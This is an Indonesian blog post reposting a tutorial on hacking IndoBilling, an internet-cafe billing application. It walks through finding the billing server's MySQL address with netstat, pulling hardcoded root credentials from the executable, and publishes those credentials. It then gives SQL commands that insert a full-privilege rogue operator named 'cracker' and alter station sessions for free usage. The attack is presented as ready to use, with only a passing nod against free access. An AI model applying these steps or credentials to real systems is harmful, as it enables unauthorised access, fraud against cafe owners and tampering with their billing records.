Selasa, 24 Agustus 2010

001

HAck IndoBilling

Indobilling?? yups.. sebuah billing warnet yang dibuat oleh anak asli Indonesia, walaupun dibuat oleh bangsa sendiri tetapi hal itu rupanya tidak berlaku untuk tangan2 jail. Pada kesempatan kali ini kita akan belajar bagaimana menghack sebuah indobilling. Tutorial ini bukanlah buatanku melainkan buatan saudaraku setanah air invisible_theater

[x] Apa itu indobilling ??
yaahhh... semacam aplikasi billing untuk warnet. mbolehin kita untuk make komputer abis kita login ke billing server alias komp OP.
Ngerti bahasne po ora dab ???? pokok e kaya gt lah ...


[x] Trus permasalahanya apa ???
sebenernya ga rumit2x amat sih mslh nya, cm koneksi nya ke database yang
ngga ke-filter.


[x] Trus untungnya apa cb kl mbaca blog mu sampe abis ???
ya macem-macem. nubah nama warnet nya, alamat warnet nya,
registrasi warnet nya, nama OP nya, bahkan mbuat km bs ngenet
dengan gratis. (yg terakhir jgn dilakuin ya ... d0s4 !! kan rejekinya udh ada
sendiri-sendiri)


[x] Emang caranya gmn c ???
manfaatin aj SQL Manager. eg. SQLyog.


[x] Trus user name sama passwordnya apa ??? kan butuh itu biar bs konek.
Tar deh gmpng.


[x] IP nya tau dr mn ??
ya liat aja pake netstat.


[x] Oww ... gt ya ... menarik jg nih. Jelasin dong !!!
kay .... pertama kali kita mesti tau IP nya server. dr mn kita tau ???
pake netstat aj.

caranya ::
buat file "netstat.bat" yang isinya berikut ini

============== NETSTAT.BAT ============= [don't copy paste this line]
netstat >> netstat.txt
open netstat.txt
========= END OF NETSTAT.BAT =========== [don't copy paste this line]

fungsi dari perintah ini adalah mencetak hasil dari "netstat" ke dalam sebuah file netstat.txt lalu membuka file tersebut. hal ini perlu dilakukan karena indobilling akan melakukan close terhadap comand prompt. (mulai deh make bahasa formal. biasa aj napa bung !!!)
nahhh .. dr hasil netstat itu, bs diliat port 3306 (port default na mySQL) lagi konek kmn.

contoh ::

========= RESULT OF NETSTAT ==================
Proto Local Address Foreign Address State
TCP 127.0.0.1:49218 Owner-PC:49219 ESTABLISHED
TCP 127.0.0.1:49219 Owner-PC:49218 ESTABLISHED
TCP 127.0.0.1:49220 Owner-PC:49221 ESTABLISHED
TCP 127.0.0.1:49221 Owner-PC:49220 ESTABLISHED
TCP 192.168.10.16:49168 cs31:5050 ESTABLISHED
TCP 192.168.10.16:49173 sip36:https ESTABLISHED
TCP 192.168.10.16:49559 202.96.64.144:ftp ESTABLISHED
TCP 192.168.10.16:49560 202.96.64.144:55944 ESTABLISHED
TCP 192.168.10.16:49561 202.96.64.144:ftp ESTABLISHED
TCP 192.168.10.16:49562 202.96.64.144:ftp ESTABLISHED
TCP 192.168.10.16:49565 192.168.10.1:3306 ESTABLISHED
==============================================

keliatan kan kalo port 3306 lagi konek ke IP 192.168.10.1. Nah IP itu tu IP na Billing Server.

Sekarang tinggal konek ke DB mySQL pake SQLyog. yg belom punya SQLyog bs didapet disini http://www.webyog.com/downloads/SQLyog604.exe

/*mlm ni masih lumayan ad temennya, nge-blog bareng 'eross fyuuhhh ... tetep ngantuk jg. (cukup ..kelamaan banget kata sambutan nya !!! ini bukan upacara bendera bung !! )*/

kemaren udh sampe di bahasan "mengetahui IP Billing Server", sekarang mulai untuk konek ke DB mySQL nya server.
yang diperluin untuk bisa konek ke DB adalah user name, password dan IP address nya server, yang msh jd pertanyaan adalah "password & username" nya apa ???

==============================
info koneksi ke mySQL server Indo Billing
username : root
password : root1
==============================

[x]nah lo ... tau dari mana tuw ?? emang developer nya temen mu ??? ato di kasih tau di webshit nya ???
yaahh... sedikit jail lah, buka aja file exe-nya pake Winhex, pasti username+password kesimpan di exe-nya sebagai ASCII, jd bisa langsung kebaca tanpa perlu convert2xan. but, jgn langsung maen buka aj, exe-nya diprotect dengan compressor lo, tp jg ga perlu kuatir karena udah ada de-compressor nya. yang jelas compressor nya make UPX, de-compressor nya nyari ndiri aja ya ...

hmmm.... udh deh, kunci udh ditangan, tinggal eksekusi aj.

[x]eksekusi dari hongkong !!!! jelasin dong caranya !!!!!!
ya gampang aja, tinggal make SQLyog nya aja, masukin username, password ama host nya dengan data-data yang udah didapet sebelum nya. nama database dibiarkan kosong aja. kalo udah terkoneksi dengan server, maka semua isi database nya bakal keliatan, nah kita bisa ngubah semua hal yang berhubungan dengan indobilling pada table "warnet".
misalnya kita pengen nambahin operator di billing server dengan username "cracker" dan password "cracker" yang full priviledges. bisa dilakukan dengan make GUI nya SQLyog atawa dengan menjalankan SQL command berikut ini :

============================================= [don't copy paste this line]
insert into operator (op_id,op_user,op_password,op_name,item,member,setup,report,close,send,billing,
op_editbilling,op_delbilling,op_editmember,op_delmember,op_edititem,op_delitem,
op_cancel)
values (22,'cracker',password('cracker'),'intruder','true','true','true','true','true','true','true','Y','Y','Y','Y','Y','Y','Y')
============================================= [don't copy paste this line]

nahhh .... gampang kan.
kalo pengen ngubah harga billing juga bisa. SQL command nya kira-kira kaya gini ni
dimana,
-> format st_start = 'yyyy-mm-dd hh:mm:ss'
-> format st_name = 'nama username'
-> st_id = 'nomor KBU'
yang perlu diinget adalah nilai "st_start" harus waktu saat pengupdatean DB dilakuin. bisa juga dengan make fungsi SQL yaitu curdate() dan curdate().

============================================= [don't copy paste this line]
update station set st_start='2007-07-01 20:30:30',st_name='invisible_theater', st_duration='00:01:00' where st_id='1'
============================================= [don't copy paste this line]

dengan menggunakan fungsi curdate() dan curtime() kira-kira kaya gini ni.

============================================= [don't copy paste this line]
update station set st_start=concat(curdate(),' ',curtime()),st_name='invisible_theater', st_duration='00:01:00' where st_id='1'
============================================= [don't copy paste this line]

kalo emang pengen ngganti2x data laen nya silakan cari ndiri aja, ini kan sekedar contoh implementasi aj dab.

[x]hmmm.... boleh-boleh .......... trus kq bisa ya ??? ada apa c sebenernya??
yahhh sebenernya cm masalah setting doang, IP address yang bukan localhost diperbolehkan untuk connect langsung ke database dan melakukan edit. too simple right ?

kira-kira gitu deh ... silakan di uprek sendiri dengan kreatifitas sendiri ya ...

invisible_theater
~Boy21~


http://boy21world.blogspot.com/2008/03/hack-indobilling.html
Diposting oleh di

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)